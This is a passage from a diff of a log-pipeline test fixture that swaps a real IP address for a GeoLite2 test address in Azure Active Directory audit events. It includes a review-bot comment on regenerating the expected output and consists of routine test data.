Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.5873254Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492828\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"fe115c66-3e08-4ab4-8a00-84ae25a59078\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n 
\\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ 
@@ -4924,9 +4924,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:52",
 "ExtendedProperties": [
 {
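Review bot: The two replaced lines here update only the raw `ActorIpAddress`/`ClientIP` strings; if the pipeline geo-enriches `ClientIP` (the new address 67.43.156.15 appears to come from the MaxMind GeoLite2 test-database ranges, which suggests that is the motivation), the derived `client.geo`/`source.geo`/`as` fields for this event change as well, and they are outside this hunk. Regenerating the expected file with `elastic-package test pipeline --generate` is safer than a textual substitution of `83.57.233.151`, since it keeps `event.original`, the parsed `o365audit.*` fields and any enrichment output consistent with each other. Independently of the tooling, dropping 83.57.233.151 is worthwhile on its own: it is a real, routable third-party address that had been committed to a public fixture, whereas the replacement is one the GeoLite2 test data uses, so it resolves deterministically in tests.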
@@ -5129,7 +5129,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:52\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\
"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}"
 },
 "o365audit": {
 "Actor": [
@@ -5159,9 +5159,9 @@
 }
 ],
 "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "AzureActiveDirectoryEventType": 1,
- "ClientIP": "83.57.233.151",
+ "ClientIP": "67.43.156.15",
 "CreationTime": "2020-02-09T15:34:52",
 "ExtendedProperties": [
 {
@@ -5376,7 +5376,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
